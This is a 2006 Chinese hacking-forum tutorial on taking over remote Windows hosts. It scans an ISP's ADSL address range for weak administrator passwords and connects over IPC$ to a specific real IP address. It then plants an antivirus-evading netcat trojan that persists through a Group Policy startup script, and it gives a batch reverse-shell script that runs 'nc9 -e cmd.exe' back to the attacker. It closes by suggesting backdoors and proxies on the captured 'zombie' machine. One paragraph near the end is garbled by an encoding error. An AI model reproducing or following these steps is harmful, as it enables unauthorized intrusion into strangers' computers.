|
中华网络安全联盟 作者:佚名 来源:网络 时间:2006-3-19
最近有空再为大家制作一个教程。原理很简单利用弱口令入侵一台远程主机,适合初学的菜鸟。但是其中一些技巧觉对值得大家学习。第一,反弹木马是我自己利用nc9.exe结合批处理做的,绝对免杀而且简单并反弹连接一个cmdshell。第二,我通过mmc把做好的木马放在了启动脚本里,隐蔽而且很少人知道这个地方,以免被查处来。网上那些复制"srv",然后用at命令添加定时服务的方法已经过时了。太麻烦不说,还要先蔽掉杀毒软件。好了不多说了开始了!!
工具:流光,系统是XP2,自做反弹木马(我已发过制作教程)。
开始了,首先打开流光添加好IP范围。我扫描的是我所在地的网通ADSL的一段IP。如图一:
开始扫描。。。。。。。。
看结果出来了!!!如图二:
运气不错,第一次就成功了。要知道现在弱口令可不好找了。。打开CMD,输入"net use \\221.192.73.113\ipc$ "" /user:administrator",看显示成功了!!如图三
接下来拿出dameware nt utilities 4.9 远程网络管理软件,这可是个好东西。打开输入IP地址如图四
然后我们依次开共享,列出服务,添加用户。。。在这我就不一一做示范了。然后打开【运行】,输入\\221.192.73.113\c$\winnt\system32 ,看打开了图五。
接着把要传的木马文件直接复制进去。然后我们在【开始】里运行mmc,打开控制台并添加组策略,注意主机要选【远程主机】并添加远程主机IP地址,如图六。
通过组策略把木马添加到启动脚本里。注意!!!一定添加到启动教本,不是开机脚本否则无法自动运行。图七
添加后在文件一栏显示的文件地址中有对方主机的IP。这时你把它改为"c:\winnt\system32\nc.bat。否则本地运行时将无法找到文件。图八
一切搞定了。。。让我们试验一下。通过dameware nt utilities
4.9的远程CMDshell执行如下命令“cd\winnt\system32”"nc.bat",然后在本机打开CMD输入"nc9 -l -p
99(这里的端口看你在木马里设的多少,要一致)"图九。
看成功溢出得到cmdshell。^_^。。图十
又一台肉鸡到手了。无论他的IP如何改变只要开机,你就能连上他。而且什么杀毒软件都不怕,100%保险。肉鸡到手,接下来就看你的了。克隆帐号,开telnet后门,做成代理。。。想干什么就干什么。不过不要搞苹担愕哪康氖怯谜飧鋈饧α废凹虻サ娜肭旨记伞P辛司偷秸獍桑渲卸阅韭聿糠钟植幻靼椎目梢钥次乙郧胺⒌慕坛獭?888了!!!!
最后加两个关于如何使用dameware nt utilities和如何制作免杀木马的补充
dameware nt
utilities的补充连接
http://bbs.hackbase.com/viewthread.php?tid=2808221&fpage=1
免杀木马的制作连接
我给改进了一下,代码如下:(保存为sys.bat,和nc9.exe一起保存在system32下面)
 k
nc9 -vv
你的域名 port>>nc9 -e cmd.exe
goto
ok
这篇文章没具体参考什么教程,只是自己总结的一些经验。和一些网上的资料
我的联系方式——Email:zcdwd@yeah.net
|
